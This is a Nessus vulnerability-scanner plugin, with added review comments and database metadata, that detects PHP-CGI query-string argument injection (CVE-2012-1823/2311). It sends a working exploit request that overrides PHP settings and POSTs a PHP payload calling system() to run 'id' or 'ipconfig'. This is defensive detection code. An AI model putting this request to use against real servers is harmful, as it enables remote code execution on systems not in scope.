ID PHP_CGI_QUERY_STRING_CODE_EXECUTION.NASL Type nessus Reporter This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2012-05-14T00:00:00
Description
The PHP installation on the remote web server contains a flaw that
could allow a remote attacker to pass command-line arguments as part
of a query string to the PHP-CGI program. This could be abused to
execute arbitrary code, reveal PHP source code, cause a system crash,
etc.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Registration block. When the scanner loads the plugin with `description`
# set, only the metadata below is recorded and the script stops at the
# exit(0) that closes this block; no traffic is sent to the target from here.
if (description)
{
script_id(59088);
script_version("1.20");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
# One check reports both identifiers: CVE-2012-1823 (the original php-cgi
# argument-injection flaw) and CVE-2012-2311 (tracking the incomplete first fix).
script_cve_id("CVE-2012-1823", "CVE-2012-2311");
script_bugtraq_id(53388);
script_xref(name:"CERT", value:"520827");
script_xref(name:"EDB-ID", value:"18834");
script_name(english:"PHP PHP-CGI Query String Parameter Injection Arbitrary Code Execution");
script_summary(english:"Tests to execute arbitrary code");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a version of PHP that allows arbitrary
code execution.");
script_set_attribute(attribute:"description", value:
"The PHP installation on the remote web server contains a flaw that
could allow a remote attacker to pass command-line arguments as part
of a query string to the PHP-CGI program. This could be abused to
execute arbitrary code, reveal PHP source code, cause a system crash,
etc.");
script_set_attribute(attribute:"see_also", value:"http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/");
script_set_attribute(attribute:"see_also", value:"http://www.php.net/archive/2012.php#id2012-05-08-1");
script_set_attribute(attribute:"see_also", value:"http://www.php.net/ChangeLog-5.php#5.3.13");
script_set_attribute(attribute:"see_also", value:"http://www.php.net/ChangeLog-5.php#5.4.3");
# https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_lotus_foundations_php_argument_command_injection_cve_2012_18234?lang=en_us
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?80589ce8");
script_set_attribute(attribute:"see_also", value:"https://www-304.ibm.com/support/docview.wss?uid=swg21620314");
# Remediation text shown in the finding. The fixed releases named here are
# 5.3.13 / 5.4.3, i.e. the releases listed for the second round of fixes.
script_set_attribute(attribute:"solution", value:
"If using Lotus Foundations, upgrade the Lotus Foundations operating
system to version 1.2.2b or later.
Otherwise, upgrade to PHP 5.3.13 / 5.4.3 or later.");
# Vendor-assigned CVSS2 vectors. They need not equal the NVD vector for
# either CVE; check which source your risk scoring consumes.
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
# NOTE(review): "exploit_available" is "false" although the framework,
# malware and exploited_by_nessus attributes in this block are all "true".
# A dashboard that filters on exploit_available alone would under-rank this
# finding; confirm the intended value.
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"exploited_by_malware", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'PHP CGI Argument Injection');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'CANVAS');
script_set_attribute(attribute:"vuln_publication_date", value:"2012/05/03");
# NOTE(review): this date is a year earlier than vuln_publication_date above;
# it looks like a typo for 2012. Confirm before using it for patch-age metrics.
script_set_attribute(attribute:"patch_publication_date", value:"2011/05/03");
script_set_attribute(attribute:"plugin_publication_date", value:"2012/05/14");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:php:php");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_end_attributes();
# ACT_ATTACK: this is an active check. The plugin body sends a request that
# runs a command on the target instead of inferring the flaw from a version
# string, so it should only be run against hosts that are in scope.
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
# Run after these plugins; os_fingerprint.nasl presumably supplies the
# Host/OS knowledge-base item read by the plugin body.
script_dependencies("http_version.nasl", "os_fingerprint.nasl");
# Not launched when the knowledge base holds Settings/disable_cgi_scanning.
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
# Launched only when the www/PHP key is present in the knowledge base
# (presumably set by an earlier plugin that detected PHP; confirm).
script_require_keys("www/PHP");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");
include("data_protection.inc");
# Target selection: an HTTP port (default 80) requested with php:TRUE, and
# one PHP page on that port to send the probe to.
port = get_http_port(default:80, php:TRUE);
# NOTE(review): Host/OS is looked up again further down before `os` is first
# read, so one of the two lookups is redundant.
os = get_kb_item("Host/OS");
# PHP pages recorded in the knowledge base for this port (presumably by an
# earlier crawl of the site; confirm against the plugin that writes this key).
files = get_kb_list("www/" + port + "/content/extensions/php*");
# With no recorded PHP page the probe falls back to /index.php; otherwise the
# first recorded page is used. Only this single path is probed, so a negative
# result speaks for that one page and not for every PHP handler on the server.
if (isnull(files)) file = "/index.php";
else
{
files = make_list(files);
file = files[0];
}
# Try to exploit the issue to run a command.
# Choose the proof-of-execution command(s). When the OS is known and
# report_paranoia is below 2, only the command for that OS family is sent;
# otherwise both are tried in turn. Both commands only print host
# information.
# NOTE(review): second lookup of Host/OS; the earlier assignment to `os` is
# never read before this one overwrites it.
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
if ("Windows" >< os) cmd = 'ipconfig /all';
else cmd = 'id';
cmds = make_list(cmd);
}
else cmds = make_list('id', 'ipconfig /all');
# Expected output for each command. Requiring this pattern in the response is
# what separates real command execution from a page that merely echoes the
# request back.
# NOTE(review): "Subnet Mask" is the English label; a localized Windows host
# would presumably print a different string and be missed (false negative).
cmd_pats = make_array();
cmd_pats['id'] = "uid=[0-9]+.*gid=[0-9]+.*";
cmd_pats['ipconfig /all'] = "Subnet Mask";
# Build the request path: the chosen PHP page followed by a query string
# made of php-cgi command-line switches instead of name=value parameters.
# The -d switches override configuration directives for this one request and
# auto_prepend_file=php://input points the interpreter at the request body.
# For defenders this is the request shape to look for in access logs: a
# query string on a PHP page that begins with "-" and has no literal "=".
url = file + "?" +
"-d allow_url_include=on "+
"-d safe_mode=off "+
"-d suhosin.simulation=on "+
"-d open_basedir=off "+
"-d auto_prepend_file=php://input " +
"-n";
# Spaces are replaced with "+" between the switches.
url = str_replace(find:" ", replace:"+", string:url);
# The unreserved set below contains neither "=" nor ":". Assuming urlencode()
# escapes every character outside `unreserved`, the "=" signs are sent as %3D
# and the query string carries no literal "=". That is the condition the
# CVE-2012-2311 record describes, so the probe exercises the incomplete first
# fix as well as the original flaw. A filtering rule therefore has to test the
# raw, undecoded query string.
url = urlencode(
str:url,
unreserved:"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_.!~*'()-]/?+"
);
# Per-run marker built from the plugin name and the current time. The payload
# echoes it, so finding it in a response ties the output to this request.
token = (SCRIPT_NAME - ".nasl") + "-" + unixtime();
# Probe loop: send one request per candidate command and stop at the first
# response that proves execution.
foreach cmd (cmds)
{
# Request body: print the marker, run the command, then `die` (presumably so
# that nothing from the original page is appended to the output).
payload = "<?php echo '" + token + "'; system('" + cmd + "'); die; ?>";
# exit_on_fail:TRUE ends the plugin if the request itself fails, so a network
# error does not fall through to the "not affected" exit at the bottom.
res = http_send_recv3(
port : port,
method : "POST",
item : url,
data : payload,
content_type : "application/x-www-form-urlencoded",
exit_on_fail : TRUE
);
# Vulnerable only if the body (res[2]) holds both the marker and output that
# matches the pattern for this command.
# NOTE(review): egrep runs over the whole body, not only the text after the
# marker, so matching text elsewhere on the page would also satisfy it.
if (
token >< res[2] &&
egrep(pattern:cmd_pats[cmd], string:res[2])
)
{
if (report_verbosity > 0)
{
# The report embeds the exact request that was sent. Scan results for this
# plugin therefore contain a working proof request for the affected host and
# should be stored and shared with the same care as other sensitive findings.
report =
'\nNessus was able to verify the issue exists using the following request :' +
'\n' +
'\n' + crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30) +
'\n' + http_last_sent_request() +
'\n' + crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30) + '\n';
if (report_verbosity > 1)
{
# Keep the response from the marker onward with the marker itself removed,
# i.e. the command output.
output = strstr(res[2], token) - token;
# The output passes through data_protection::sanitize_uid() before it is
# added to the report (presumably to mask account details; confirm in
# data_protection.inc).
report +=
'\n' + 'This produced the following output :' +
'\n' +
'\n' + crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) +
'\n' + data_protection::sanitize_uid(output:chomp(output)) +
'\n' + crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n';
}
security_hole(port:port, extra:report);
}
else security_hole(port);
# First confirmed execution is enough; remaining commands are not sent.
exit(0);
}
}
# Reached only when no probe produced the marker plus matching output. This
# means the one page tested did not execute the payload. It does not prove
# the installed PHP version is fixed, since the page may not be served
# through php-cgi or the request may have been filtered on the way.
exit(0, "The web server listening on port " + port + " is not affected.");
{"id": "PHP_CGI_QUERY_STRING_CODE_EXECUTION.NASL", "bulletinFamily": "scanner", "title": "PHP PHP-CGI Query String Parameter Injection Arbitrary Code Execution", "description": "The PHP installation on the remote web server contains a flaw that\ncould allow a remote attacker to pass command-line arguments as part\nof a query string to the PHP-CGI program. This could be abused to\nexecute arbitrary code, reveal PHP source code, cause a system crash,\netc.", "published": "2012-05-14T00:00:00", "modified": "2012-05-14T00:00:00", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:C/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/59088", "reporter": "This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.php.net/ChangeLog-5.php#5.3.13", "http://www.php.net/archive/2012.php#id2012-05-08-1", "https://www-304.ibm.com/support/docview.wss?uid=swg21620314", "http://www.php.net/ChangeLog-5.php#5.4.3", "http://www.nessus.org/u?80589ce8", "http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/"], "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "type": "nessus", "lastseen": "2021-01-20T13:26:22", "edition": 27, "viewCount": 50, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-1823", "CVE-2012-2311"]}, {"type": "threatpost", "idList": ["THREATPOST:9FD19F2ACF1E3C44BAE775A250F1E132", "THREATPOST:4E1049C3C10581837DF71F684CB00683", "THREATPOST:3EEA9D9B7CBDC9687FD961AD1AF59EF5", "THREATPOST:51FB010AA47AEB7BA9A071B3DC8D9989", "THREATPOST:2FB93CCBD166A84F825AED5B7F560EAD", "THREATPOST:A5E5D5921DAB8BB3CACFA91664901B61"]}, {"type": "nessus", "idList": ["SUSE_11_APACHE2-MOD_PHP53-120504.NASL", "OPENSUSE-2012-261.NASL", "DEBIAN_DSA-2465.NASL", "SUSE_APACHE2-MOD_PHP5-8114.NASL", "SUSE_11_APACHE2-MOD_PHP5-120504.NASL", "FREEBSD_PKG_59B68B1E9C7811E1B5E0000C299B62E1.NASL", "FEDORA_2012-7628.NASL", "UBUNTU_USN-1437-1.NASL", "FEDORA_2012-7586.NASL", "FEDORA_2012-7567.NASL"]}, 
{"type": "fedora", "idList": ["FEDORA:42AD9212FB", "FEDORA:2174220F39", "FEDORA:2FE26212BB", "FEDORA:11BE720F24", "FEDORA:A24AB20F77", "FEDORA:ACED120F82", "FEDORA:A07AD21BF1", "FEDORA:B599720F97", "FEDORA:9729C2155E", "FEDORA:089FC20F0D"]}, {"type": "ubuntu", "idList": ["USN-1437-1"]}, {"type": "openvas", "idList": ["OPENVAS:841002", "OPENVAS:864256", "OPENVAS:864253", "OPENVAS:1361412562310841002", "OPENVAS:1361412562310864262", "OPENVAS:1361412562310864256", "OPENVAS:864259", "OPENVAS:864262", "OPENVAS:850218", "OPENVAS:864257"]}, {"type": "suse", "idList": ["SUSE-SU-2012:0598-1", "OPENSUSE-SU-2012:0590-1", "SUSE-SU-2012:0598-2", "SUSE-SU-2012:0604-1"]}, {"type": "cert", "idList": ["VU:520827"]}, {"type": "freebsd", "idList": ["59B68B1E-9C78-11E1-B5E0-000C299B62E1", "60DE13D5-95F0-11E1-806A-001143CD36D8"]}, {"type": "exploitdb", "idList": ["EDB-ID:29290", "EDB-ID:40233", "EDB-ID:18836", "EDB-ID:29316", "EDB-ID:18834"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2465-1:8EF31"]}, {"type": "canvas", "idList": ["PHP_CGI_REMOTE"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:85B20F0533D328BC2DFA7020D0F11896"]}, {"type": "redhat", "idList": ["RHSA-2012:0570", "RHSA-2012:0546"]}, {"type": "centos", "idList": ["CESA-2012:0546"]}, {"type": "seebug", "idList": ["SSV:72859", "SSV:82805"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:123859", "PACKETSTORM:112477"]}, {"type": "zdt", "idList": ["1337DAY-ID-21429"]}], "modified": "2021-01-20T13:26:22", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2021-01-20T13:26:22", "rev": 2}, "vulnersScore": 7.6}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59088);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-1823\", \"CVE-2012-2311\");\n script_bugtraq_id(53388);\n 
script_xref(name:\"CERT\", value:\"520827\");\n script_xref(name:\"EDB-ID\", value:\"18834\");\n\n script_name(english:\"PHP PHP-CGI Query String Parameter Injection Arbitrary Code Execution\");\n script_summary(english:\"Tests to execute arbitrary code\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a version of PHP that allows arbitrary\ncode execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"The PHP installation on the remote web server contains a flaw that\ncould allow a remote attacker to pass command-line arguments as part\nof a query string to the PHP-CGI program. This could be abused to\nexecute arbitrary code, reveal PHP source code, cause a system crash,\netc.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/archive/2012.php#id2012-05-08-1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/ChangeLog-5.php#5.3.13\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/ChangeLog-5.php#5.4.3\");\n # https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_lotus_foundations_php_argument_command_injection_cve_2012_18234?lang=en_us\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?80589ce8\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www-304.ibm.com/support/docview.wss?uid=swg21620314\");\n script_set_attribute(attribute:\"solution\", value:\n\"If using Lotus Foundations, upgrade the Lotus Foundations operating\nsystem to version 1.2.2b or later. 
\n\nOtherwise, upgrade to PHP 5.3.13 / 5.4.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nos = get_kb_item(\"Host/OS\");\nfiles = get_kb_list(\"www/\" + port + \"/content/extensions/php*\");\n\nif (isnull(files)) file = \"/index.php\";\nelse\n{\n files = make_list(files);\n file = files[0];\n}\n\n# Try to exploit the issue to run a command.\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig /all';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig /all');\n\ncmd_pats = make_array();\ncmd_pats['id'] = \"uid=[0-9]+.*gid=[0-9]+.*\";\ncmd_pats['ipconfig /all'] = \"Subnet Mask\";\n\n\nurl = file + \"?\" +\n \"-d allow_url_include=on \"+\n \"-d safe_mode=off \"+\n \"-d suhosin.simulation=on \"+\n \"-d open_basedir=off \"+\n \"-d auto_prepend_file=php://input \" +\n \"-n\";\nurl = str_replace(find:\" \", replace:\"+\", string:url);\nurl = urlencode(\n str:url, \n unreserved:\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_.!~*'()-]/?+\"\n);\ntoken = (SCRIPT_NAME - \".nasl\") + \"-\" + unixtime();\n\nforeach cmd (cmds)\n{\n payload = \"<?php echo '\" + token + \"'; system('\" + cmd + \"'); die; ?>\";\n\n res = http_send_recv3(\n port : port,\n method : \"POST\",\n item : url,\n data : payload,\n content_type : \"application/x-www-form-urlencoded\",\n exit_on_fail : TRUE\n );\n\n if (\n token >< res[2] &&\n egrep(pattern:cmd_pats[cmd], string:res[2])\n )\n {\n if (report_verbosity > 0)\n {\n report = \n '\\nNessus was able to verify the issue exists using the following request 
:' +\n '\\n' +\n '\\n' + crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) +\n '\\n' + http_last_sent_request() +\n '\\n' + crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n';\n\n if (report_verbosity > 1)\n {\n output = strstr(res[2], token) - token;\n\n report +=\n '\\n' + 'This produced the following output :' +\n '\\n' +\n '\\n' + crap(data:\"-\", length:30) + \" snip \" + crap(data:\"-\", length:30) +\n '\\n' + data_protection::sanitize_uid(output:chomp(output)) +\n '\\n' + crap(data:\"-\", length:30) + \" snip \" + crap(data:\"-\", length:30) + '\\n';\n }\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n }\n}\nexit(0, \"The web server listening on port \" + port + \" is not affected.\");\n", "naslFamily": "CGI abuses", "pluginID": "59088", "cpe": ["cpe:/a:php:php"], "scheme": null}
{"cve": [{"lastseen": "2021-02-02T05:59:49", "description": "sapi/cgi/cgi_main.c in PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script (aka php-cgi), does not properly handle query strings that contain a %3D sequence but no = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-1823.", "edition": 6, "cvss3": {}, "published": "2012-05-11T10:15:00", "title": "CVE-2012-2311", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2311"], "modified": "2018-01-18T02:29:00", "cpe": ["cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.4.6", "cpe:/a:php:php:5.1.5", "cpe:/a:php:php:4.0.4", "cpe:/a:php:php:5.2.1", "cpe:/a:php:php:5.2.12", "cpe:/a:php:php:5.4.1", "cpe:/a:php:php:3.0.11", "cpe:/a:php:php:3.0.17", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:5.2.11", "cpe:/a:php:php:5.3.4", "cpe:/a:php:php:5.2.9", "cpe:/a:php:php:5.2.6", "cpe:/a:php:php:4.4.2", "cpe:/a:php:php:5.1.4", "cpe:/a:php:php:3.0.12", "cpe:/a:php:php:4.4.8", "cpe:/a:php:php:4.4.9", "cpe:/a:php:php:4.0", "cpe:/a:php:php:3.0.15", "cpe:/a:php:php:5.3.8", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.4.3", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:5.1.3", "cpe:/a:php:php:5.3.9", "cpe:/a:php:php:3.0.16", 
"cpe:/a:php:php:4.3.4", "cpe:/a:php:php:5.4.0", "cpe:/a:php:php:5.1.6", "cpe:/a:php:php:5.2.3", "cpe:/a:php:php:5.2.5", "cpe:/a:php:php:3.0.9", "cpe:/a:php:php:3.0.4", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:5.3.6", "cpe:/a:php:php:3.0.8", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:3.0.2", "cpe:/a:php:php:3.0", "cpe:/a:php:php:5.3.10", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:3.0.1", "cpe:/a:php:php:2.0", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:5.3.5", "cpe:/a:php:php:3.0.14", "cpe:/a:php:php:5.3.1", "cpe:/a:php:php:5.2.10", "cpe:/a:php:php:4.4.7", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:5.2.4", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:5.2.0", "cpe:/a:php:php:5.3.0", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:5.2.15", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:3.0.7", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:5.2.8", "cpe:/a:php:php:5.3.11", "cpe:/a:php:php:3.0.3", "cpe:/a:php:php:4.4.1", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:5.2.13", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:4.4.4", "cpe:/a:php:php:4.3.3", "cpe:/a:php:php:5.2.2", "cpe:/a:php:php:5.3.12", "cpe:/a:php:php:5.3.7", "cpe:/a:php:php:3.0.10", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:5.2.17", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:3.0.13", "cpe:/a:php:php:3.0.5", "cpe:/a:php:php:5.3.2", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:4.4.5", "cpe:/a:php:php:5.2.7", "cpe:/a:php:php:3.0.6", "cpe:/a:php:php:2.0b10", "cpe:/a:php:php:5.1.2", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:1.0", "cpe:/a:php:php:5.3.3", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:5.2.14", "cpe:/a:php:php:3.0.18", "cpe:/a:php:php:4.0.6", "cpe:/a:php:php:5.2.16"], "id": "CVE-2012-2311", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2311", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": 
["cpe:2.3:a:php:php:5.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", 
